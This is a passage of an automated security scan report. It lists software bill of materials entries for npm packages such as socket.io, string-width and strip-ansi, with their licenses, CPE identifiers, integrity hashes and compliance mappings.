evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:socket:socket.io:4.8.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/socket.io@4.8.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/socket.io/-/socket.io-4.8.3.tgz integrity: sha512-2Dd78bqzzjE6KPkD5fHZmDAKRNe3J15q+YHDrIsy9WEkqttc7GY+kT9OBLSMaPbQaEd0x1BjcmtMtXkfpc+T5A== dependencies: accepts: ~1.3.4 base64id: ~2.0.0 cors: ~2.8.5 debug: ~4.4.1 engine.io: ~6.6.0 socket.io-adapter: ~2.5.2 socket.io-parser: ~4.2.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a08d32cd24a38070 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: socket.io-adapter 2.5.6' title: socket.io-adapter 2.5.6 description: 'Package discovered: socket.io-adapter 2.5.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 423a38d81e2dc8e3 name: socket.io-adapter version: 2.5.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:socket.io-adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:socket.io-adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:socket.io_adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:socket.io_adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:socket.io:socket.io-adapter:2.5.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:socket.io:socket.io_adapter:2.5.6:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/socket.io-adapter@2.5.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.5.6.tgz integrity: sha512-DkkO/dz7MGln0dHn5bmN3pPy+JmywNICWrJqVWiVOyvXjWQFIv9c2h24JrQLLFJ2aQVQf/Cvl1vblnd4r2apLQ== dependencies: debug: ~4.4.1 ws: ~8.18.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 126bbc6e6f7db2d9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: socket.io-client 4.8.3' title: socket.io-client 4.8.3 description: 'Package discovered: socket.io-client 4.8.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ecd3152d103ea0f9 name: socket.io-client version: 4.8.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:socket.io-client:socket.io-client:4.8.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:socket.io-client:socket.io_client:4.8.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:socket.io_client:socket.io-client:4.8.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:socket.io_client:socket.io_client:4.8.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:socket.io:socket.io-client:4.8.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:socket.io:socket.io_client:4.8.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/socket.io-client@4.8.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/socket.io-client/-/socket.io-client-4.8.3.tgz integrity: sha512-uP0bpjWrjQmUt5DTHq9RuoCBdFJF10cdX9X+a368j/Ft0wmaVgxlrjvK3kjvgCODOMMOz9lcaRzxmso0bTWZ/g== dependencies: '@socket.io/component-emitter': ~3.1.0 debug: ~4.4.1 engine.io-client: ~6.6.1 socket.io-parser: ~4.2.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4e07aea60237064a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: socket.io-parser 4.2.6' title: socket.io-parser 4.2.6 description: 'Package discovered: socket.io-parser 4.2.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f9190921d6308e46 name: socket.io-parser version: 4.2.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:socket:socket.io-parser:4.2.6:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/socket.io-parser@4.2.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/socket.io-parser/-/socket.io-parser-4.2.6.tgz integrity: sha512-asJqbVBDsBCJx0pTqw3WfesSY0iRX+2xzWEWzrpcH7L6fLzrhyF8WPI8UaeM4YCuDfpwA/cgsdugMsmtz8EJeg== dependencies: '@socket.io/component-emitter': ~3.1.0 debug: ~4.4.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1381d8de85a9f426 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: source-map-js 1.2.1' title: source-map-js 1.2.1 description: 'Package discovered: source-map-js 1.2.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ef14348a3e7aef73 name: source-map-js version: 1.2.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:source-map-js:source-map-js:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:source-map-js:source_map_js:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:source_map_js:source-map-js:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:source_map_js:source_map_js:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:source-map:source-map-js:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:source-map:source_map_js:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:source_map:source-map-js:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:source_map:source_map_js:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:source:source-map-js:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:source:source_map_js:1.2.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/source-map-js@1.2.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz integrity: sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8a8949f600357d51 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: standard-as-callback 2.1.0' title: standard-as-callback 2.1.0 description: 'Package discovered: standard-as-callback 2.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ae42b44f62499323 name: standard-as-callback version: 2.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:standard-as-callback:standard-as-callback:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:standard-as-callback:standard_as_callback:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:standard_as_callback:standard-as-callback:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:standard_as_callback:standard_as_callback:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:standard-as:standard-as-callback:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:standard-as:standard_as_callback:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:standard_as:standard-as-callback:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:standard_as:standard_as_callback:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:standard:standard-as-callback:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:standard:standard_as_callback:2.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/standard-as-callback@2.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/standard-as-callback/-/standard-as-callback-2.1.0.tgz integrity: sha512-qoRRSyROncaz1z0mvYqIE4lCd9p2R90i6GxW3uZv5ucSu8tU7B5HXUP1gG8pVZsYNVaXjk8ClXHPttLyxAL48A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4830d30cd7a05603 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: statuses 2.0.2' title: statuses 2.0.2 description: 'Package discovered: statuses 2.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7442cb30a409bd68 name: statuses version: 2.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:statuses:statuses:2.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/statuses@2.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/statuses/-/statuses-2.0.2.tgz integrity: sha512-DvEy55V3DB7uknRo+4iOGT5fP1slR8wQohVdknigZPMpMstaKJQWhwiYBACJE3Ul2pTnATihhBYnRhZQHGBiRw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fce9dfc2e720150a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/@esbuild/darwin-arm64/bin/esbuild startLine: 0 message: 'Package discovered: stdlib go1.20.12' title: stdlib go1.20.12 description: 'Package discovered: stdlib go1.20.12' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 755a3e00c5f656c9 name: stdlib version: go1.20.12 type: go-module foundBy: go-module-binary-cataloger locations: - path: /node_modules/@esbuild/darwin-arm64/bin/esbuild accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: [] language: go cpes: - cpe: cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:* source: syft-generated purl: pkg:golang/stdlib@1.20.12 metadataType: go-module-buildinfo-entry metadata: goCompiledVersion: go1.20.12 architecture: '' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 684726e125b93b59 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/esbuild/bin/esbuild startLine: 0 message: 'Package discovered: stdlib go1.20.12' title: stdlib go1.20.12 description: 'Package discovered: stdlib go1.20.12' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e9a4a6eb4de31a0f name: stdlib version: go1.20.12 type: go-module foundBy: go-module-binary-cataloger locations: - path: /node_modules/esbuild/bin/esbuild accessPath: /node_modules/esbuild/bin/esbuild annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: [] language: go cpes: - cpe: cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:* source: syft-generated purl: pkg:golang/stdlib@1.20.12 metadataType: go-module-buildinfo-entry metadata: goCompiledVersion: go1.20.12 architecture: '' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 12c7b9072b4ac0c3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: stream-events 1.0.5' title: stream-events 1.0.5 description: 'Package discovered: stream-events 1.0.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d6075f31d1f26f1b name: stream-events version: 1.0.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:stream-events:stream-events:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:stream-events:stream_events:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:stream_events:stream-events:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:stream_events:stream_events:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:stream:stream-events:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:stream:stream_events:1.0.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/stream-events@1.0.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz integrity: sha512-E1GUzBSgvct8Jsb3v2X15pjzN1tYebtbLaMg+eBOUOAxgbLoSbT2NS91ckc5lJD1KfLjId+jXJRgo0qnV5Nerg== dependencies: stubs: ^3.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 42a667b9f8ef2c86 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: stream-shift 1.0.3' title: stream-shift 1.0.3 description: 'Package discovered: stream-shift 1.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1acff9076c855611 name: stream-shift version: 1.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:stream-shift:stream-shift:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:stream-shift:stream_shift:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:stream_shift:stream-shift:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:stream_shift:stream_shift:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:stream:stream-shift:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:stream:stream_shift:1.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/stream-shift@1.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/stream-shift/-/stream-shift-1.0.3.tgz integrity: sha512-76ORR0DO1o1hlKwTbi/DM3EXWGf3ZJYO8cXX5RJwnul2DEg2oyoZyjLNoQM8WsvZiFKCRfC1O0J7iCvie3RZmQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 89e93178704235e4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: streamsearch 1.1.0' title: streamsearch 1.1.0 description: 'Package discovered: streamsearch 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c7163598759ab751 name: streamsearch version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:streamsearch:streamsearch:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/streamsearch@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz integrity: sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d28f82c740f787aa ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: string-width 4.2.3' title: string-width 4.2.3 description: 'Package discovered: string-width 4.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6c7ed5b8c0bd71e8 name: string-width version: 4.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:string-width:string-width:4.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string-width:string_width:4.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string_width:string-width:4.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string_width:string_width:4.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string:string-width:4.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string:string_width:4.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/string-width@4.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz integrity: sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g== dependencies: emoji-regex: ^8.0.0 is-fullwidth-code-point: ^3.0.0 strip-ansi: ^6.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a6a2288a986748af ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: string-width 5.1.2' title: string-width 5.1.2 description: 'Package discovered: string-width 5.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 303a44f8f6ca903e name: string-width version: 5.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:string-width:string-width:5.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string-width:string_width:5.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string_width:string-width:5.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string_width:string_width:5.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string:string-width:5.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string:string_width:5.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/string-width@5.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz integrity: sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA== dependencies: eastasianwidth: ^0.2.0 emoji-regex: ^9.2.2 strip-ansi: ^7.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d318d3d155c6a9dd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: string_decoder 1.1.1' title: string_decoder 1.1.1 description: 'Package discovered: string_decoder 1.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 829e7f04cb28f180 name: string_decoder version: 1.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:string-decoder:string-decoder:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string-decoder:string_decoder:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string_decoder:string-decoder:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string_decoder:string_decoder:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string:string-decoder:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string:string_decoder:1.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/string_decoder@1.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz integrity: sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg== dependencies: safe-buffer: ~5.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 42e775567d560303 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: string_decoder 1.3.0' title: string_decoder 1.3.0 description: 'Package discovered: string_decoder 1.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 31e1990d6adabf2b name: string_decoder version: 1.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:string-decoder:string-decoder:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string-decoder:string_decoder:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string_decoder:string-decoder:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string_decoder:string_decoder:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string:string-decoder:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:string:string_decoder:1.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/string_decoder@1.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz integrity: sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA== dependencies: safe-buffer: ~5.2.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 611033baae4657b2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: strip-ansi 6.0.1' title: strip-ansi 6.0.1 description: 'Package discovered: strip-ansi 6.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e47d9046945afbeb name: strip-ansi version: 6.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:strip-ansi:strip-ansi:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:strip-ansi:strip_ansi:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:strip_ansi:strip-ansi:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:strip_ansi:strip_ansi:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: 